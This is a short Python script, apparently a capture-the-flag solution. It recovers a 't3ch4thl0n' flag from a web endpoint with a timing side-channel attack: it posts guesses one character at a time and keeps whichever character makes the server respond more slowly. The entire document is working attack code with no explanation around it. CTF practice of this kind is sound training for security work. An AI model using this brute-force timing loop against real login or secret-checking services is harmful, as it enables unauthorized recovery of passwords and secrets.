import requests
import time

url = "https://asdasdasd-b52q.onrender.com/password"
flag="t3ch4thl0n{"
flag_length = 26 

for i in range(flag_length):
    for char in "abcdefghijklmnopqrstuvwxyz0123456789{}_":
        attempt = flag + char
        start_time = time.time()
        
        response = requests.post(url, json={"answerString": attempt})
        end_time = time.time()
        
        # Calculate response time
        response_time = end_time - start_time
        
        # If the response time is longer, we likely have a correct character
        if response_time > 0.5 + len(flag) * 0.5:
            flag += char
            print(f"Found character: {char} -> Current flag: {flag}")
            break
print(f"Final guessed flag: {flag}")
